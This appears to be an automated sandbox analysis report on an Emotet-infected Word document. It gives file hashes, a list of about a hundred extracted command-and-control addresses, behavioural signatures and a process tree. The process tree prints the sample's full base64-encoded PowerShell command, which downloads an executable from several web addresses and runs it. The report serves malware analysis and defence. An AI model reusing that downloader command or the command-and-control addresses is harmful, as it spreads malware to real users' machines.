Analysis
-
max time kernel
150s -
max time network
156s -
resource
win10v191014
Task
task1
Sample
Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.99.doc
Resource
win7v191014
General
-
Target
Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.99
-
Sample
191212-dbqq6ew7ds
-
SHA256
5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0
Malware Config
Extracted
emotet
190.146.14.143:443
85.235.219.74:80
78.187.204.70:80
46.105.128.215:8080
69.30.205.162:7080
192.161.190.171:8080
163.172.97.112:8080
86.98.157.3:80
113.52.135.33:7080
175.127.140.68:80
212.129.14.27:8080
200.41.121.69:443
143.95.101.72:8080
190.161.67.63:80
50.116.78.109:8080
37.46.129.215:8080
119.57.36.54:8080
212.112.113.235:80
46.105.131.68:8080
1.32.54.12:8080
139.59.12.63:8080
190.5.162.204:80
83.99.211.160:80
67.254.196.78:443
187.250.92.82:80
83.110.107.243:443
124.150.175.129:8080
123.142.37.165:80
24.28.178.71:80
190.189.79.73:80
182.176.116.139:995
86.70.224.211:80
190.171.135.235:80
115.179.91.58:80
41.218.118.66:80
85.109.190.235:443
178.134.1.238:80
95.216.207.86:7080
142.93.87.198:8080
81.82.247.216:80
95.216.212.157:8080
86.6.123.109:80
165.100.148.200:443
24.27.122.202:80
176.58.93.123:80
193.33.38.208:443
67.171.182.231:80
190.101.87.170:80
185.244.167.25:443
46.17.6.116:8080
82.79.244.92:80
181.44.166.242:80
77.245.12.212:80
158.69.167.246:8080
191.100.24.201:50000
189.225.211.171:443
181.47.235.26:993
174.57.150.13:8080
200.71.112.158:53
41.77.74.214:443
78.46.87.133:8080
192.241.220.183:8080
172.104.70.207:8080
42.51.192.231:8080
124.150.175.133:80
201.196.15.79:990
23.253.207.142:8080
221.154.59.110:80
210.224.65.117:80
60.53.3.153:8080
195.250.143.182:80
51.38.134.203:8080
89.215.225.15:80
138.197.140.163:8080
201.183.251.100:80
128.92.54.20:80
5.189.148.98:8080
110.142.161.90:80
175.103.239.50:80
195.191.107.67:80
189.61.200.9:443
192.210.217.94:8080
98.15.140.226:80
58.93.151.148:80
100.38.11.243:80
103.122.75.218:80
91.117.31.181:80
198.57.217.170:8080
122.11.164.183:80
37.59.24.25:8080
210.111.160.220:80
162.144.46.90:8080
83.156.88.159:80
78.186.102.195:80
211.218.105.101:80
187.233.220.93:443
172.90.70.168:443
72.69.99.47:80
177.103.201.23:80
72.27.212.209:8080
119.159.150.176:443
216.75.37.196:8080
188.230.134.205:80
153.190.41.185:80
45.129.121.222:443
Signatures
-
description ioc pid Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" 4612 svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" 4612 svchost.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5004 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2460 wrote to memory of 3092 2460 SppExtComObj.exe 74 PID 4740 wrote to memory of 4292 4740 Powershell.exe 85 PID 4292 wrote to memory of 3540 4292 177.exe 86 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4740 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 3540 177.exe -
description ioc pid Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm 5004 WINWORD.EXE File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm 5004 WINWORD.EXE File opened for modification C:\Users\Admin\AppData\Local\Temp\Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.99.doc 5004 WINWORD.EXE File created C:\Users\Admin\AppData\Local\Temp\~$cs_cc7d6d8e28fce962e81a6ba5c82f29bb.99.doc 5004 WINWORD.EXE -
Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
description ioc pid Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 5004 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 5004 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc pid Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 5004 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 5004 WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 5004 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily 5004 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 5004 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4740 Powershell.exe -
Drops file in system dir 5 IoCs
description ioc pid Process File opened for modification C:\Windows\Debug\ESE.TXT 3920 svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp 3920 svchost.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp 3920 svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp 3920 svchost.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp 3920 svchost.exe -
Executes dropped EXE 2 IoCs
pid Process 4292 177.exe 3540 177.exe -
description ioc pid Process Event created Global\E35C89477 3540 177.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5004 WINWORD.EXE 4292 177.exe 3540 177.exe -
Checks system information in the registry (likely anti-VM) 2 TTPs 4 IoCs
description ioc pid Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer 5004 WINWORD.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName 5004 WINWORD.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer 3004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName 3004 svchost.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.99.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Drops Office document
- Checks processor information in registry (likely anti-VM)
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks system information in the registry (likely anti-VM)
PID:5004
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2460
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵PID:3092
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABZAGwAcABnAGQAegBtAGIAPQAnAFUAcwBzAGIAYgBtAHoAaAB1AGgAeABrAGUAJwA7ACQATABnAGUAZABrAGsAZABxAHcAIAA9ACAAJwAxADcANwAnADsAJABJAHoAegBxAHoAaABxAHoAdAB5AHoAPQAnAEEAaQBkAHcAagBxAG4AbABjAGoAeABlAGoAJwA7ACQARABiAGIAcwBrAHAAdwBhAHoAdgBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAGcAZQBkAGsAawBkAHEAdwArACcALgBlAHgAZQAnADsAJABFAG4AaABsAGsAcABxAG0APQAnAFkAbQBjAHQAaABjAG4AagBrAHUAeQAnADsAJABCAHkAdwB3AG0AegB5AHAAbgBlAD0AJgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAEMATABJAEUAbgBUADsAJABGAGkAdgBsAHcAbAB6AG8AeQB1AHUAdABsAD0AJwBoAHQAdABwADoALwAvAGEAYwBxAHUAYQAuAHMAbwBsAGEAcgBjAHkAdABlAGMALgBjAG8AbQAvAHIAdABzAGIAZwBzAC8AWABpAFcAbQB0AFkAWQB1AHIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAC4AbABlAGEAcgBuAGMAeQAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AdQBzAGUAcgAvAG8AeABaAHEAUQBwAC8AKgBoAHQAdABwADoALwAvAGgAbwBzAHAAaQB0AGEAbABzAGEAbgByAGEAZgBhAGUAbAAuAGEAaQBuAGkAbQBlAGQAaQBuAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHYAdwBmAC0AaQA4AGcAZQAtADQANAA0ADUAOQAxADcALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGcANwA3ADEALgBrAHcAaQBrAGYAdQBuAG4AZQBsAHMALgBjAG8AbQAvAHAAaABwAG0AeQBhAGQAbQBpAG4AXwBiAGMAawAvAHgAOQB0AGYAbgAtAGwAdgAxAGgANAAtADEANwA0ADEAMgA5ADUAOQA2AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AcwBpAHkAaQBuAGoAaQBjAGgAYQBuAGcAagBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBXAFkAcwB6AHMAUAAvACcALgAiAFMAYABQAGwASQB0ACIAKAAnACoAJwApADsAJABVAG4AaABjAGcAcQBiAG0AcABmAG0APQAnAFIAbgBmAGgAagB3AGIAaABsACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAgAGkAbgAgACQARgBpAHYAbAB3AGwAegBvAHkAdQB1AHQAbAApAHsAdAByAHkAewAkAEIAeQB3AHcAbQB6AHkAcABuAGUALgAiAEQAbwB3AE4AbABvAGAAQQBkAGYAYABJAEwAZQAiACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAsACAAJABEAGIAYgBzAGsAcAB3AGEAegB2AGYAKQA7ACQAUwB1AGcAawB1AHoAaQBmAGwAeQA9ACcAQwBuAGoAdgBhAGMAaQBnAHEAeQBhAGwAegAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApAC4AIgBMAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMgAyADkAMAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABhAGAAUgB0ACIAKAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApADsAJABDAHIAZwBpAGsAdwBqAGwAawBxAD0AJwBYAGgAagBoAGUAcQBkAHQAegBhAGEAJwA7AGIAcgBlAGEAawA7ACQAVwB2AHQAdQB2AGwAcgB3AD0AJwBUAHMAZQBuAGYAZQB5AGwAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBqAGoAcAB0AGcAaQBhAGsAawA9ACcAQgBmAG4AYgBwAHIAcABmAGEAdQBhACcA1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4740
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in system dir
PID:3920
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4188
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵
- Checks system information in the registry (likely anti-VM)
PID:3004
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:4936
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵
- Windows security modification
PID:4612
-
C:\Users\Admin\177.exe"C:\Users\Admin\177.exe"1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4292
-
C:\Users\Admin\177.exe--653e7fcf1⤵
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
- Emotet Sync
- Suspicious use of SetWindowsHookEx
PID:3540
Network
MITRE ATT&CK Enterprise v15
MITRE ATT&CK Additional techniques
- T1089